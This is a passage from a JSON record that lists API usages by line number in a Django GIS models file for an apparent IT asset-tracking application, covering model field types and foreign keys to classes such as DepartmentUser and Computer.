168, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 168, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 168, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 168, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 168, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 169, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 169, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 169, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 169, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 169, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 191, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 191, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 194, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 194, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 195, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 195, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 196, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 196, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 196, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.BooleanField", "line_number": 197, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 197, "usage_type": "name"}, {"api_name": "tracking.models.CommonFields", "line_number": 206, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 206, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 207, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 207, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.OneToOneField", "line_number": 209, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 209, "usage_type": "name"}, {"api_name": "tracking.models.Computer", "line_number": 209, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 209, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.OneToOneField", "line_number": 210, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 210, "usage_type": "name"}, {"api_name": "tracking.models.Mobile", "line_number": 210, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 210, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 211, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 211, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 212, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 212, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 213, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 213, "usage_type": "name"}, {"api_name": 
"django.contrib.gis.db.models.TextField", "line_number": 214, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 214, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 215, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 215, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 216, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 216, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 217, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 217, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.BooleanField", "line_number": 218, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 218, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 219, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 219, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 220, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 220, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 222, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 222, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 222, "usage_type": "attribute"}, {"api_name": "tracking.models.CommonFields", "line_number": 233, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 233, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 239, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 239, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 240, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 240, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 240, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 240, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 240, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 241, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 241, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 242, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 242, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 248, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 248, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 252, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 252, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveIntegerField", "line_number": 253, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 253, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 259, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 259, "usage_type": "name"}, {"api_name": 
"django.contrib.gis.db.models.ForeignKey", "line_number": 269, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 269, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 269, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 270, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 270, "usage_type": "name"}, {"api_name": "tracking.models.CommonFields", "line_number": 280, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 280, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 310, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 310, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 311, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 311, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 312, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 312, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 313, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 313, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 314, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 314, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 315, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 315, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ManyToManyField", "line_number": 316, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 316, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 317, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 317, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 317, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 317, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 317, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 318, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 318, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 318, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 318, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 318, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 319, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 319, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 319, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 319, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 319, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 320, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 320, "usage_type": "name"}, {"api_name": 
"tracking.models.DepartmentUser", "line_number": 320, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 320, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 320, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 321, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 321, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.URLField", "line_number": 322, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 322, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.URLField", "line_number": 323, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 323, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.URLField", "line_number": 324, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 324, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 325, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 325, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 326, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 326, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 327, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 327, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 328, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 328, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 329, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 329, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveIntegerField", "line_number": 330, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 330, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveIntegerField", "line_number": 331, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 331, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.URLField", "line_number": 332, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 332, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ManyToManyField", "line_number": 333, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 333, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ManyToManyField", "line_number": 334, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 334, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ManyToManyField", "line_number": 335, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 335, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 336, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 336, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 337, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 337, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 337, 
"usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 337, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 339, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 339, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 340, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 340, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 340, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 340, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 342, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 342, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 343, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 343, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.URLField", "line_number": 344, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 344, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 345, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 345, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.URLField", "line_number": 346, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 346, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.DurationField", "line_number": 347, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 347, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 347, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.DurationField", "line_number": 348, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 348, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 348, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.DurationField", "line_number": 349, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 349, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 349, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models.FileField", "line_number": 350, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 350, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveIntegerField", "line_number": 353, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 353, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ManyToManyField", "line_number": 355, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 355, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.DateField", "line_number": 356, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 356, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 372, "usage_type": "call"}, {"api_name": "tracking.models.CommonFields", "line_number": 385, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 385, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.OneToOneField", "line_number": 411, "usage_type": "call"}, {"api_name": 
"django.contrib.gis.db.models", "line_number": 411, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 412, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 412, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 413, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 413, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 413, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 414, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 414, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 415, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 415, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 416, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 416, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 417, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 417, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 418, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 418, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 419, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 419, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 420, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 420, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 421, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 421, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 422, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 422, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 423, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 423, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 424, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 424, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 425, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 425, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.DateField", "line_number": 426, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 426, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 427, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 427, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 428, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 428, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 436, "usage_type": 
"call"}, {"api_name": "django.utils.timezone.now", "line_number": 443, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 443, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 452, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 452, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 453, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 453, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 454, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 454, "usage_type": "name"}, {"api_name": "django.contrib.postgres.fields.JSONField", "line_number": 455, "usage_type": "call"}, {"api_name": "tracking.models.CommonFields", "line_number": 461, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 461, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 465, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 465, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.URLField", "line_number": 466, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 466, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 467, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 467, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.URLField", "line_number": 468, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 468, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.NullBooleanField", "line_number": 469, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 469, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 470, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 470, "usage_type": "name"}, {"api_name": "tracking.models.DepartmentUser", "line_number": 470, "usage_type": "attribute"}, {"api_name": "tracking.models", "line_number": 470, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 470, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.ManyToManyField", "line_number": 471, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 471, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 472, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 472, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 472, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 473, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 473, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveSmallIntegerField", "line_number": 474, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 474, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 475, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 475, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 481, "usage_type": 
"attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 481, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveIntegerField", "line_number": 484, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 484, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 485, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 485, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 486, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 486, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 492, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 492, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 497, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 497, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 498, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 498, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ManyToManyField", "line_number": 499, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 499, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 505, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 505, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.CharField", "line_number": 509, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 509, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.TextField", "line_number": 510, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 510, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ManyToManyField", "line_number": 511, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 511, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveIntegerField", "line_number": 512, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 512, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 522, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 522, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 526, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 526, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 526, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 527, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 527, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 527, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models.PositiveIntegerField", "line_number": 528, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 528, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.Model", "line_number": 538, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 538, "usage_type": "name"}, {"api_name": 
"django.contrib.gis.db.models.ForeignKey", "line_number": 542, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 542, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 543, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 543, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.ForeignKey", "line_number": 544, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 544, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PROTECT", "line_number": 545, "usage_type": "attribute"}, {"api_name": "django.contrib.gis.db.models", "line_number": 545, "usage_type": "name"}, {"api_name": "django.contrib.gis.db.models.PositiveIntegerField", "line_number": 547, "usage_type": "call"}, {"api_name": "django.contrib.gis.db.models", "line_number": 547, "usage_type": "name"}]}